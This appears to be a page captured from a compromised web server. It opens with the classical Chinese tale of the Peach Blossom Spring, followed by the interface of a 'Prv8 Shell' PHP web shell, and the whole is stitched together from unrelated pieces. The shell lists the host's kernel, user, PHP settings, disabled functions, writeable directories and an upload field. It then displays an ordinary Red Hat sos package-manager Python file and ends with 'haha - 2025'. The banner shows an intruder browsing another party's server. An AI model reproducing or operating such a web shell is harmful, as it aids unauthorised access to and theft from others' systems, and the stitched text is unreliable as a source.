晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 .
Prv8 Shell
Server : Apache
System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64
User : rainic ( 1014)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /lib/python3.6/site-packages/sos/policies/package_managers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //lib/python3.6/site-packages/sos/policies/package_managers/__init__.py
# Copyright 2020 Red Hat, Inc. Jake Hunsaker <jhunsake@redhat.com>

# This file is part of the sos project: https://github.com/sosreport/sos
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# version 2 of the GNU General Public License.
#
# See the LICENSE file in the source distribution for further information.

import re
import fnmatch

from sos.utilities import sos_get_command_output


class PackageManager():
    """Encapsulates a package manager. If you provide a query_command to the
    constructor it should print each package on the system in the following
    format::

        package name|package.version

    You may also subclass this class and provide a _generate_pkg_list method to
    build the list of packages and versions.

    :cvar query_command: The command to use for querying packages
    :vartype query_command: ``str`` or ``None``

    :cvar verify_command: The command to use for verifying packages
    :vartype verify_command: ``str`` or ``None``

    :cvar verify_filter: Optional filter to use for controlling package
                         verification
    :vartype verify_filter: ``str or ``None``

    :cvar files_command: The command to use for getting file lists for packages
    :vartype files_command: ``str`` or ``None``

    :cvar chroot: Perform a chroot when executing `files_command`
    :vartype chroot: ``bool``

    :cvar remote_exec: If package manager is on a remote system (e.g. for
                       sos collect), use this to execute commands
    :vartype remote_exec: ``SoSTransport.run_command()``
    """

    query_command = None
    verify_command = None
    verify_filter = None
    files_command = None
    query_path_command = None
    chroot = None
    files = None

    def __init__(self, chroot=None, remote_exec=None):
        self._packages = None
        self.files = []
        self.remote_exec = remote_exec

        if chroot:
            self.chroot = chroot

    @property
    def packages(self):
        if self._packages is None:
            self._generate_pkg_list()
        return self._packages

    @property
    def manager_name(self):
        return self.__class__.__name__.lower().split('package', maxsplit=1)[0]

    def exec_cmd(self, command, timeout=30, need_root=False, env=None,
                 use_shell=False, chroot=None):
        """
        Runs a package manager command, either via sos_get_command_output() if
        local, or via a SoSTransport's run_command() if this needs to be run
        remotely, as in the case of remote nodes for use during `sos collect`.

        :param command:     The command to execute
        :type command:      ``str``

        :param timeout:     Timeout for command to run, in seconds
        :type timeout:      ``int``

        :param need_root:   Does the command require root privileges?
        :type need_root:    ``bool``

        :param env:         Environment variables to set
        :type env:          ``dict`` with keys being env vars to define

        :param use_shell:   If running remotely, does the command require
                            obtaining a shell?
        :type use_shell:      ``bool``

        :param chroot:      If necessary, chroot command execution to here
        :type chroot:       ``None`` or ``str``

        :returns:   The output of the command
        :rtype:     ``str``
        """
        if self.remote_exec:
            ret = self.remote_exec(command, timeout, need_root, env, use_shell)
        else:
            ret = sos_get_command_output(command, timeout, chroot=chroot,
                                         env=env)
        if ret['status'] == 0:
            return ret['output']
        # In the case of package managers, we don't want to potentially iterate
        # over stderr, so prevent the package methods from doing anything at
        # all by returning nothing.
        return ''

    def all_pkgs_by_name(self, name):
        """
        Get a list of packages that match name.

        :param name: The name of the package
        :type name: ``str``

        :returns: List of all packages matching `name`
        :rtype: ``list``
        """
        return fnmatch.filter(self.packages.keys(), name)

    def all_pkgs_by_name_regex(self, regex_name, flags=0):
        """
        Get a list of packages that match regex_name.

        :param regex_name: The regex to use for matching package names against
        :type regex_name: ``str``

        :param flags: Flags for the `re` module when matching `regex_name`

        :returns: All packages matching `regex_name`
        :rtype: ``list``
        """
        reg = re.compile(regex_name, flags)
        return [pkg for pkg in self.packages if reg.match(pkg)]

    def pkg_by_name(self, name):
        """
        Get a single package that matches name.

        :param name: The name of the package
        :type name: ``str``

        :returns: The first package that matches `name`
        :rtype: ``str``
        """
        try:
            return self.packages[name]
        except Exception:
            return None

    def _parse_pkg_list(self, pkg_list):
        """
        Using the output of `query_command`, build the _packages dict.

        This should be overridden by distinct package managers and be a
        generator for _generate_pkg_list which will insert the packages into
        the _packages dict.

        This method should yield a tuple of name, version, release for each
        package parsed. If the package manager or distribution does not use a
        release field, set it to None.

        :param pkg_list: The output of the result of `query_command`
        :type pkg_list:  ``str``
        """
        raise NotImplementedError

    def _generate_pkg_list(self):
        """Generates a dictionary of packages for internal use by the package
        manager in the format::

            {'package_name': {'name': 'package_name',
                              'version': 'major.minor.version',
                              'release': 'package release' or None,
                              'pkg_manager': 'package manager name'}}

        """
        if self._packages is None:
            self._packages = {}

        if self.query_command:
            cmd = self.query_command
            pkg_list = self.exec_cmd(cmd, timeout=30, chroot=self.chroot)

            for pkg in self._parse_pkg_list(pkg_list):
                self._packages[pkg[0]] = {
                    'name': pkg[0],
                    'version': pkg[1].split('.'),
                    'release': pkg[2],
                    'pkg_manager': self.manager_name
                }

    def pkg_version(self, pkg):
        """Returns the entry in self.packages for pkg if it exists

        :param pkg: The name of the package
        :type pkg: ``str``

        :returns: Package name and version, if package exists
        :rtype: ``dict`` if found, else ``None``
        """
        if pkg in self.packages:
            return self.packages[pkg]
        return None

    def all_files(self):
        """
        Get a list of files known by the package manager

        :returns: All files known by the package manager
        :rtype: ``list``
        """
        if self.files_command and not self.files:
            cmd = self.files_command
            files = self.exec_cmd(cmd, timeout=180, chroot=self.chroot)
            self.files = files.splitlines()
        return self.files

    def pkg_by_path(self, path):
        """Given a path, return the package that owns that path.

        :param path:    The filepath to check for package ownership
        :type path:     ``str``

        :returns:       The package name or 'unknown'
        :rtype:         ``str``
        """
        if not self.query_path_command:
            return 'unknown'
        try:
            cmd = f"{self.query_path_command} {path}"
            pkg = self.exec_cmd(cmd, timeout=5, chroot=self.chroot)
            return pkg.splitlines() or 'unknown'
        except Exception:
            return 'unknown'

    def build_verify_command(self, packages):
        """build_verify_command(self, packages) -> str
            Generate a command to verify the list of packages given
            in ``packages`` using the native package manager's
            verification tool.

            The command to be executed is returned as a string that
            may be passed to a command execution routine (for e.g.
            ``sos_get_command_output()``.

            :param packages: a string, or a list of strings giving
                             package names to be verified.
            :returns: a string containing an executable command
                      that will perform verification of the given
                      packages.
            :rtype: str or ``NoneType``
        """
        if not self.verify_command:
            return None

        # The re.match(pkg) used by all_pkgs_by_name_regex() may return
        # an empty list (`[[]]`) when no package matches: avoid building
        # an rpm -V command line with the empty string as the package
        # list in this case.
        by_regex = self.all_pkgs_by_name_regex
        verify_list = filter(None, map(by_regex, packages))

        # No packages after regex match?
        if not verify_list:
            return None

        verify_packages = ""
        for package_list in verify_list:
            for package in package_list:
                if any(f in package for f in self.verify_filter):
                    continue
                if verify_packages:
                    verify_packages += " "
                verify_packages += package
        return self.verify_command + " " + verify_packages


class MultiPackageManager(PackageManager):
    """
    This class is used to leverage multiple individual package managers as a
    single entity on systems that support multiple concurrent package managers.

    Policies that use this approach will need to specify a primary package
    manager, and at least one fallback manager. When queries are sent to this
    manager, the primary child manager is checked first. If there is a valid,
    not None, response (e.g. a given package is installed) then that response
    is used. However, if the response is empty or None, the fallback managers
    are then queried in the order they were passed to MultiPackageManager
    during initialization.

    :param primary: The primary package manager to rely on
    :type primary:  A subclass of `PackageManager`

    :param fallbacks: A list of package managers to use if the primary does not
                      provide a response
    :type fallbacks: ``list`` of `PackageManager` subclasses
    """

    def __init__(self, primary, fallbacks, chroot=None, remote_exec=None):
        super().__init__(chroot=chroot, remote_exec=remote_exec)

        if not issubclass(primary, PackageManager):
            raise Exception(
                f"Primary package manager must be PackageManager subclass, not"
                f" {primary.__class__}"
            )

        if not isinstance(fallbacks, list):
            raise Exception('Fallbacks must be specified in a list')

        for pm in fallbacks:
            if not issubclass(pm, PackageManager):
                raise Exception(
                    f"Fallback package managers must be PackageManager "
                    f"subclass, not {pm.__class__}"
                )

        self.primary = primary(chroot=chroot, remote_exec=remote_exec)
        self.fallbacks = [
            pm(chroot=chroot, remote_exec=remote_exec) for pm in fallbacks
        ]

        if not self.fallbacks:
            raise Exception(
                'Must define at least one fallback package manager'
            )

        self._managers = [self.primary]
        self._managers.extend(self.fallbacks)

    def _parse_pkg_list(self, pkg_list):
        """
        Using the output of `query_command`, build the _packages dict.

        This should be overridden by distinct package managers and be a
        generator for _generate_pkg_list which will insert the packages into
        the _packages dict.

        This method should yield a tuple of name, version, release for each
        package parsed. If the package manager or distribution does not use a
        release field, set it to None.

        :param pkg_list: The output of the result of `query_command`
        :type pkg_list:  ``str``
        """
        raise NotImplementedError

    def all_files(self):
        if not self.files:
            for pm in self._managers:
                self.files.extend(pm.all_files())
        return self.files

    def _generate_pkg_list(self):
        if self._packages is None:
            self._packages = {}

        self._packages.update(self.primary.packages)
        for pm in self.fallbacks:
            _pkgs = pm.packages
            for pkg in _pkgs.keys():
                if pkg not in self._packages:
                    self._packages[pkg] = _pkgs[pkg]

    def _pm_wrapper(self, method):
        """
        This wrapper method is used to provide implicit iteration through the
        primary and any defined fallback managers that are set for a given
        instance of MultiPackageManager.

        Important note: we pass the _name_ of the method to run here as a
        string, and not any actual method as we rely on iteratively looking up
        the actual method in each package manager.

        :param method: The name of the method we're wrapping for the purpose of
                       iterating through defined package managers
        :type method:  ``str``
        """
        def pkg_func(*args, **kwargs):
            ret = None
            for pm in self._managers:
                if not ret or ret == 'unknown':
                    _wrapped_func = getattr(pm, method)
                    ret = _wrapped_func(*args, **kwargs)
            return ret
        return pkg_func

    def __getattribute__(self, item):
        # if the attr is callable, then we need to iterate over our child
        # managers until we get a response, unless it is _generate_pkg_list in
        # which case we only want to use the one actually defined here, or
        # _pm_wrapper, which we need to avoid this override for to not hit
        # recursion hell.
        if item in ['_generate_pkg_list', '_pm_wrapper', 'all_files']:
            return super().__getattribute__(item)
        attr = super().__getattribute__(item)
        if hasattr(attr, '__call__'):
            return self._pm_wrapper(item)
        return attr

# vim: set et ts=4 sw=4 :

haha - 2025